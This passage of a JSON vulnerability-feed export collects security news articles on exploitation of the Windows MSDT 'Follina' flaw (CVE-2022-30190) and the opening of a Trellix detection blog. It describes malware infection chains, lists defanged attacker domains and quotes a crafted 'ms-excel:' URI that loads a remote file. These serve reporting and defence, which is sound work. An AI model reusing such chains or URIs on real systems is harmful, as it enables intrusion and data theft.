backdoor on Windows systems.\n\n\"Rozena is a backdoor malware that is capable of injecting a remote shell connection back to the attacker's machine,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor>) in a report this week.\n\nTracked as [CVE-2022-30190](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>), the now-patched Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability has come under heavy exploitation in recent weeks ever since it came to light in late May 2022.\n\nThe starting point for the latest attack chain observed by Fortinet is a weaponized [Office document](<https://www.virustotal.com/gui/file/432bae48edf446539cae5e20623c39507ad65e21cb757fb514aba635d3ae67d6/details>) that, when opened, connects to a [Discord CDN URL](<https://thehackernews.com/2021/04/alert-theres-new-malware-out-there.html>) to retrieve an HTML file (\"[index.htm](<https://www.virustotal.com/gui/file/3558840ffbc81839a5923ed2b675c1970cdd7c9e0036a91a0a728af14f80eff3/details>)\") that, in turn, invokes the diagnostic utility using a PowerShell command to download next-stage payloads from the same CDN attachment space.\n\nThis includes the Rozena implant (\"Word.exe\") and a batch file (\"cd.bat\") that's designed to terminate MSDT processes, establish the backdoor's persistence by means of a Windows Registry modification, and download a harmless Word document as a decoy.\n\nThe malware's core function is to inject shellcode that launches a reverse shell to the attacker's host (\"microsofto.duckdns[.]org\"), ultimately allowing the attacker to take control of the system in order to monitor and capture information, while also maintaining a backdoor to the compromised
system.\n\nThe exploitation of the Follina flaw to distribute malware through malicious Word documents comes as social engineering attacks are [relying](<https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns>) on Microsoft Excel, Windows shortcut (LNK), and ISO image files as droppers to deploy malware such as [Emotet](<https://thehackernews.com/2022/06/new-emotet-variant-stealing-users.html>), [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>), [IcedID](<https://thehackernews.com/2022/04/new-hacking-campaign-targeting.html>), and [Bumblebee](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) to a victim's device.\n\nThe droppers are said to be distributed through emails that directly contain the dropper or a password-protected ZIP as an attachment, an HTML file that extracts the dropper when opened, or a link to download the dropper in the body of the email.\n\nWhile attacks spotted in early April prominently featured Excel files with XLM macros, Microsoft's decision to block macros by default around the same time is said to have forced the threat actors to pivot to alternative methods like [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>) as well as .LNK and .ISO files.\n\nLast month, Cyble disclosed details of a malware tool called
[Quantum](<https://thehackernews.com/2022/06/new-quantum-builder-lets-attackers.html>) that's being sold on underground forums so as to equip cybercriminal actors with capabilities to build malicious .LNK and .ISO files.\n\nIt's worth noting that [macros](<https://docs.microsoft.com/en-us/microsoft-365/security/intelligence/macro-malware>) have been a tried-and-tested [attack vector](<https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/>) for adversaries looking to drop ransomware and other malware on Windows systems, whether it be through phishing emails or other means.\n\nMicrosoft has since [temporarily paused](<https://thehackernews.com/2022/07/microsoft-quietly-rolls-back-plan-to.html>) its plans to disable Office macros in files downloaded from the internet, with the company telling The Hacker News that it's taking the time to make \"additional changes to enhance usability.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-09T08:49:00", "type": "thn", "title": "Hackers Exploiting Follina Bug to Deploy Rozena Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM",
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-12T03:25:38", "id": "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "href": "https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T05:56:38", "description": "An unofficial security patch has been made available for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), even as the Follina flaw continues to be exploited in the wild.\n\nThe issue \u2014 referenced as **DogWalk** \u2014 relates to a path traversal flaw that can be exploited to stash a malicious executable file in the Windows Startup folder when a potential target opens a specially crafted \".diagcab\" archive file that contains a diagnostics configuration file.\n\nThe idea is that the payload would get executed the next time the victim logs in to the system after a restart.
The vulnerability affects all Windows versions, starting from Windows 7 and Server 2008 to the latest releases.\n\nDogWalk was originally [disclosed](<https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd>) by security researcher Imre Rad in January 2020 after Microsoft, having acknowledged the problem, deemed it not a security issue.\n\n\"There are a number of file types that can execute code in such a way but aren't technically 'executables,'\" the tech giant said at the time. \"And a number of these are considered unsafe for users to download/receive in email, even '.diagcab' is blocked by default in Outlook on the web and other places.\"\n\nWhile all files downloaded and received via email include a Mark-of-the-Web ([MOTW](<https://attack.mitre.org/techniques/T1553/005/>)) tag that's used to determine their origin and trigger an appropriate security response, 0patch's Mitja Kolsek noted that the MSDT application is not designed to check this flag and hence allows the .diagcab file to be opened without warning.\n\n\"Outlook is not the only delivery vehicle: such file is cheerfully downloaded by all major browsers including Microsoft Edge by simply visiting(!)
a website, and it only takes a single click (or mis-click) in the browser's downloads list to have it opened,\" Kolsek [said](<https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html>).\n\n\"No warning is shown in the process, in contrast to downloading and opening any other known file capable of executing [the] attacker's code.\"\n\nThe patches and the [renewed interest](<https://twitter.com/j00sean/status/1532416426702786560>) in the zero-day bug follow [active exploitation](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) of the \"[Follina](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>)\" remote code execution vulnerability by leveraging malware-laced Word documents that abuse the \"ms-msdt:\" protocol URI scheme.\n\nAccording to enterprise security firm Proofpoint, the flaw (CVE-2022-30190, CVSS score: 7.8) is being weaponized by a threat actor tracked as [TA570](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to deliver the [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>) (aka Qakbot) information-stealing trojan.\n\n\"Actor uses thread hijacked messages with HTML attachments which, if opened, drop a ZIP archive,\" the company [said](<https://twitter.com/threatinsight/status/1534227444915482625>) in a series of tweets detailing the phishing attacks.\n\n\"Archive contains an IMG with a Word doc, shortcut file, and DLL. The LNK will execute the DLL to start QBot. 
The doc will load and execute an HTML file containing PowerShell abusing CVE-2022-30190 used to download and execute QBot.\"\n\nQBot has also been employed by [initial access brokers](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to gain initial access to target networks, enabling ransomware affiliates to [abuse the foothold](<https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/>) to deploy file-encrypting malware.\n\nThe DFIR Report, earlier this year, also [documented](<https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/>) how QBot infections move at a rapid pace, enabling the malware to harvest browser data and Outlook emails a mere 30 minutes after initial access and propagate the payload to an adjacent workstation around the 50-minute mark.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:24:00", "type": "thn", "title": "Researchers Warn of Unpatched \"DogWalk\" Microsoft Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T05:26:49", "id": "THN:A24E3ECC17FDA35932981ED1D0B9B351", "href": "https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-07T15:29:02", "description": "The Computer Emergency Response Team of Ukraine (CERT-UA) has [cautioned](<https://cert.gov.ua/article/341128>) of a new set of spear-phishing attacks exploiting the \"Follina\" flaw in the Windows operating system to deploy password-stealing malware.\n\nAttributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled \"Nuclear Terrorism A Very Real Threat.rtf\" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.\n\nFollina ([CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>), CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), but not before it was subjected to widespread zero-day exploit activity by numerous threat actors.\n\nAccording to an independent report published by Malwarebytes,
[CredoMap](<https://www.virustotal.com/gui/file/2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933/detection>) is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) [divulged](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) last month as having been deployed against users in Ukraine.\n\nThe malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.\n\n\"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence,\" Malwarebytes [said](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>). \"The target, and the involvement of APT28 (a division of Russian military intelligence), suggests that the campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state.\"\n\nIt's not just APT28.
CERT-UA has further [warned](<https://cert.gov.ua/article/160530>) of [similar](<https://cert.gov.ua/article/339662>) [attacks](<https://cert.gov.ua/article/40559>) mounted by [Sandworm](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons onto targeted hosts in media and critical infrastructure entities.\n\nThe development comes as Ukraine continues to be a [target for cyberattacks](<https://thehackernews.com/2022/05/ukrainian-cert-warns-citizens-of-new.html>) amidst the country's ongoing war with Russia, with [Armageddon hackers](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) also spotted [distributing](<https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine>) the [GammaLoad.PS1_v2 malware](<https://cert.gov.ua/article/40240>) in May 2022.\n\n**_Update:_** Amidst relentless hacking attempts tailored to drop malware in Ukrainian organizations, Microsoft revealed in a [special report](<https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/>) that state-backed Russian hackers have engaged in \"strategic espionage\" against 128 targets spanning governments, think tanks, businesses, and aid groups in 42 countries supporting Kyiv since the onset of the war.\n\n49% of the observed activity focused on government agencies, followed by IT (20%), critical infrastructure (19%), and NGOs (12%).
Just 29% of these intrusions are said to have been successful, with a quarter of the incidents leading to the exfiltration of sensitive data.\n\n\"To date, the Russians haven't used destructive 'wormable' malware that can jump from one computer domain to another and thereby cross international borders to spread economic damage,\" the Redmond-based tech giant said.\n\n\"Instead, they are designing attacks to stay within Ukraine. While Russia has been careful to confine its destructive malware to specific network domains located within Ukraine itself, these attacks are more sophisticated and widespread.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-22T12:51:00", "type": "thn", "title": "Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist":
["CVE-2022-30190"], "modified": "2022-09-07T14:46:15", "id": "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "href": "https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-11T04:24:57", "description": "The threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the [upcoming NATO Summit](<https://en.wikipedia.org/wiki/2023_Vilnius_summit>) in Vilnius as well as an identified organization supporting Ukraine abroad.\n\nThe findings come from the BlackBerry Threat Research and Intelligence team, which [found](<https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit>) two malicious documents submitted from a Hungarian IP address on July 4, 2023.\n\nRomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was [recently observed](<https://thehackernews.com/2023/05/romcom-rat-using-deceptive-web-of-rogue.html>) staging cyber attacks against politicians in Ukraine who are working closely with Western countries and a U.S.-based healthcare organization involved with aiding refugees fleeing the war-torn country.\n\nAttack chains mounted by the group are geopolitically motivated and have employed spear-phishing emails to point victims to cloned websites hosting trojanized versions of popular software.
Targets include militaries, food supply chains, and IT companies.\n\nThe latest lure documents identified by BlackBerry impersonate the Ukrainian World Congress, a legitimate non-profit (\"[Overview_of_UWCs_UkraineInNATO_campaign.docx](<https://www.virustotal.com/gui/file/a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f>)\"), and feature a bogus letter declaring support for Ukraine's inclusion in NATO (\"[Letter_NATO_Summit_Vilnius_2023_ENG(1).docx](<https://www.virustotal.com/gui/file/3a3138c5add59d2172ad33bc6761f2f82ba344f3d03a2269c623f22c1a35df97>)\").\n\n\"Although we haven't yet uncovered the initial infection vector, the threat actor likely relied on spear-phishing techniques, engaging their victims to click on a specially crafted replica of the Ukrainian World Congress website,\" the Canadian company said in an analysis published last week.\n\nOpening the file triggers a sophisticated execution sequence that entails retrieving intermediate payloads from a remote server, which, in turn, exploits Follina ([CVE-2022-30190](<https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html>)), a now-patched security flaw affecting Microsoft's Support Diagnostic Tool (MSDT), to achieve remote code execution.\n\nThe result is the deployment of RomCom RAT, an executable written in C++ that's designed to collect information about the compromised system and remotely commandeer it.\n\n\"Based on the nature of the upcoming NATO Summit and the related lure documents sent out by the threat actor, the intended victims are representatives of Ukraine, foreign organizations, and individuals supporting Ukraine,\" BlackBerry
said.\n\n\"Based on the available information, we have medium to high confidence to conclude that this is a RomCom rebranded operation, or that one or more members of the RomCom threat group are behind this new campaign supporting a new threat group.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-10T06:42:00", "type": "thn", "title": "RomCom RAT Targeting NATO and Ukraine Support Groups", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-11T03:32:37", "id": "THN:C17A0F3DD156CF2240FAEABA6716D0E9", "href": "https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T17:56:10", "description":
"Microsoft on Monday published guidance for a newly discovered [zero-day security flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in its Office productivity suite that could be exploited to achieve code execution on affected systems.\n\nThe weakness, now assigned the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted.\n\n\"To help protect customers, we've published CVE-2022-30190 and additional guidance [here](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>),\" a Microsoft spokesperson told The Hacker News in an emailed statement.\n\nThe [Follina](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the \"ms-msdt:\" URI scheme. The sample was uploaded to VirusTotal from Belarus.\n\nBut the first signs of exploitation of the flaw date back to April 12, 2022, when a second sample was uploaded to the malware database.
This artifact is believed to have targeted users in Russia with a malicious Word document (\"[\u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc](<https://www.virustotal.com/gui/file/710370f6142d945e142890eb427a368bfc6c5fe13a963f952fb884c38ef06bfa/detection/>)\") that masqueraded as an interview invitation with Sputnik Radio.\n\n\"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\" Microsoft said in an advisory for CVE-2022-30190.\n\n\"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.\"\n\nThe tech giant credited crazyman, a member of the [Shadow Chaser Group](<https://twitter.com/ShadowChasing1>), for reporting the flaw on April 12, coinciding with the discovery of the in-the-wild exploit targeting Russian users, indicating the company had already been aware of the vulnerability.\n\nIndeed, according to [screenshots](<https://twitter.com/CrazymanArmy/status/1531117401181671430>) shared by the researcher on Twitter, Microsoft closed the vulnerability submission report on April 21, 2022 stating \"the issue has been fixed,\" while also dismissing the flaw as \"not a security issue\" since it requires a passkey provided by a support technician when starting the diagnostic tool.\n\nBesides releasing detection rules for Microsoft Defender for Endpoint, the Redmond-based company has offered workarounds in its guidance to disable
the MSDT URL protocol via a Windows Registry modification.\n\n\"If the calling application is a Microsoft Office application, by default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office, both of which prevent the current attack,\" Microsoft said.\n\nThis is not the first time Microsoft Office protocol schemes like \"ms-msdt:\" have come under the scanner for their potential misuse. Earlier this January, German cybersecurity company SySS [disclosed](<https://blog.syss.com/posts/abusing-ms-office-protos/>) how it's possible to open files directly via specially crafted URLs such as \"ms-excel:ofv|u|https://192.168.1.10/poc[.]xls.\"\n", "cvss3": {}, "published": "2022-05-31T05:12:00", "type": "thn", "title": "Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T17:53:19", "id": "THN:1EFEC00D867275514EA180819C9EF104", "href": "https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-26T14:15:34", "description": "A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO** as part of an espionage campaign aimed at Tibetan entities.\n\nTargets
primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.\n\nThe intrusions involved the exploitation of [CVE-2022-1040](<https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html>) and [CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) (aka \"Follina\"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.\n\n\"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies,\" Recorded Future [said](<https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets>) in a new technical analysis.\n\nTA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\nThe group's exploitation of the Follina flaw was previously [highlighted](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.\n\nAlso put to use in a spear-phishing attack identified in May 2022 was a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the
custom LOWZERO implant. This was achieved by employing a [Royal Road RTF weaponizer tool](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), which is widely shared among Chinese threat actors.\n\nIn another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.\n\nLOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.\n\n\"The group continues to incorporate new capabilities while also relying on tried-and-tested tactics, techniques, and procedures,\" the cybersecurity firm said.\n\n\"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of [wider](<https://www.technologyreview.com/2022/02/28/1046575/how-china-built-a-one-of-a-kind-cyber-espionage-behemoth-to-last/>) [trends](<https://www.crowdstrike.com/global-threat-report/>) with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T12:14:00", "type": "thn", "title": "Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-30190"], "modified": "2022-09-26T13:59:50", "id": "THN:44DD118DC206D25EB4ECAE95173FE16E", "href": "https://thehackernews.com/2022/09/chinese-espionage-hackers-target.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nDuring the end of May 2022, independent security researcher reported a vulnerability (assigned CVE-2022-30190) in Microsoft Support 
Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is invoked through its URI protocol handler. The URI protocol **ms-msdt:/** could also be invoked from a malicious Word document which, when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. Subsequently, the vulnerability was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network, including those found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features, improving the product\u2019s overall threat detection capabilities.\n\nOver the next few sections of this blog, we will highlight a couple of advanced detection features in Trellix NSP which help protect customers against this attack and future attacks of a similar nature.\n\n## Introduction \n\nAn MS Word document exploiting the Microsoft Support Diagnostic Tool vulnerability (CVE-2022-30190) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. 
However, the number 0438 turns out to be the area code of the region **Follina** in Italy, hence the name. The exploit document has not been found to be connected to Italy in any way.\n\n Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of MS Office\u2019s core features, Object Linking and Embedding (OLE), has been abused as an initial attack vector, and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. Traditionally, Object Linking and Embedding has contributed significantly to building weaponized Office exploits, and we believe this will continue. As with CVE-2021-40444 and many other exploits, OLE was used to link the document to an externally hosted object, in this case an HTML file. \n\nThe [MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) state that an Office Open XML document can embed objects or link to external objects, and that these are specified via relationships. Any embedded or linked object specified in the container application (the OOXML document in this case) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type of the object and the application used to load the object data. An excerpt from the specifications is shown below:\n\n Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>), ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded, and **ProgID=\u201chtmlfile\u201d** indicates the type of the linked object data. 
As shown in the CVE-2022-30190 exploit document below, the **document.xml.rels** file has a Type attribute specifying the relationship as \u201coleObject\u201d, a **Target** attribute set to the OLE object link and **TargetMode** set to External. This allows the crafted document to link to an externally hosted, potentially malicious object and invoke the respective protocol handler to render it, which could lead to the exploitation of logic flaws in object renderers.\n\n Figure 3: Structure of exploit document \n\n\nLooking at the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the HTML file:\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. The HTML file hosted on this domain contains a script block padded with commented lines. This is required to make the HTML file sufficiently large (precisely, greater than 4KB) for it to be processed and rendered by mshtml.dll. \n\n Figure 4: downloaded html file from server \n\n\nSubsequently, the script tries to invoke the PCWDiagnostic package through the MSDT URI protocol handler with multiple arguments, one of which is 